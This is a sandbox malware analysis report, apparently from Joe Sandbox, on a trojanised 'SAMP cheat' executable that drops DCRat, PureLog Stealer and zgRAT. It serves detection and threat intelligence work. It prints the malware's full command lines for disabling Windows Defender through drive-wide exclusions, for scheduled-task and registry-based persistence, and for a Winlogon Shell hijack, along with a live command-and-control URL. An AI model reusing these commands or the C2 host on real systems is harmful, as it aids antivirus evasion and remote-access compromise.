Windows Analysis Report
SAMP_CHEAT_ATVECHAU2.exe.bin.exe

Overview

General Information

Sample name: SAMP_CHEAT_ATVECHAU2.exe.bin.exe
Analysis ID: 1590012
MD5: be4ae5e0b545e43608ae6a60ce297871
SHA1: ded512ee44ed38b7a6541b4e1d797387a27a5d93
SHA256: 076c80010cb400aa03881eb5d88c6e2e4677c0d405255c48154bcf780e549533
Tags: DCRat, exe, NyashTeam, user-MalHunter3

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SAMP_CHEAT_ATVECHAU2.exe.bin.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe" MD5: BE4AE5E0B545E43608AE6A60CE297871)
    • wscript.exe (PID: 4636 cmdline: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BridgePortsurrogateserverref.exe (PID: 4340 cmdline: "C:\msportComWin/BridgePortsurrogateserverref.exe" MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
          • csc.exe (PID: 4184 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5452 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 344 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 3964 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 344 cmdline: schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6008 cmdline: schtasks.exe /create /tn "BridgePortsurrogateserverrefB" /sc MINUTE /mo 13 /tr "'C:\msportComWin\BridgePortsurrogateserverref.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • powershell.exe (PID: 1552 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 792 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2056 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3268 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1840 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2156 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1964 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2168 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2092 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1732 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6008 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7212 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7248 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7308 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7340 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8224 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8944 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • jnowHpJlZlXal.exe (PID: 1652 cmdline: C:\msportComWin\jnowHpJlZlXal.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • jnowHpJlZlXal.exe (PID: 5928 cmdline: C:\msportComWin\jnowHpJlZlXal.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • services.exe (PID: 8536 cmdline: C:\Recovery\services.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • services.exe (PID: 8564 cmdline: C:\Recovery\services.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • cleanup

Malware Configuration (DCRat):
{"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-CZP27witmtYUEWaffZeU", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Source | Rule | Description | Author | Strings
SAMP_CHEAT_ATVECHAU2.exe.bin.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
SAMP_CHEAT_ATVECHAU2.exe.bin.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\services.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\services.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\msportComWin\BridgePortsurrogateserverref.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(7 further entries not shown)

Source | Rule | Description | Author | Strings
00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: BridgePortsurrogateserverref.exe PID: 4340 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(5 further entries not shown)

                                    System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetFilename: C:\Recovery\services.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 1552, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Recovery\services.exe, CommandLine: C:\Recovery\services.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\services.exe, NewProcessName: C:\Recovery\services.exe, OriginalFileName: C:\Recovery\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Recovery\services.exe, ProcessId: 8536, ProcessName: services.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\msportComWin\jnowHpJlZlXal.exe", EventID: 13, EventType: SetValue, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jnowHpJlZlXal
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\msportComWin\jnowHpJlZlXal.exe", EventID: 13, EventType: SetValue, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", ProcessId: 4184, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 1552, ProcessName: powershell.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 4184, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP", ProcessId: 5452, ProcessName: cvtres.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe, ParentProcessId: 5812, ParentProcessName: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" , ProcessId: 4636, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetFilename: C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 1552, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Recovery\services.exe, CommandLine: C:\Recovery\services.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\services.exe, NewProcessName: C:\Recovery\services.exe, OriginalFileName: C:\Recovery\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Recovery\services.exe, ProcessId: 8536, ProcessName: services.exe

                                    Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", ProcessId: 4184, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T13:31:51.132803+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49805 | 104.21.32.1 | 80 | TCP
2025-01-13T13:32:26.325209+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49971 | 104.21.32.1 | 80 | TCP
2025-01-13T13:32:37.122225+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49973 | 104.21.32.1 | 80 | TCP
2025-01-13T13:32:41.231727+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49977 | 104.21.32.1 | 80 | TCP
2025-01-13T13:32:47.168578+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49979 | 104.21.32.1 | 80 | TCP
2025-01-13T13:32:53.277113+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49980 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:15.294345+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49981 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:25.138184+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49982 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:34.169521+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49983 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:36.653982+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:43.341431+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49985 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:45.591524+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:48.091522+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:52.591564+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:57.201064+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 104.21.32.1 | 80 | TCP
2025-01-13T13:33:59.841721+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 104.21.32.1 | 80 | TCP

                                    AV Detection

                                    barindex
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeAvira: detected
                                    Source: C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Recovery\services.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
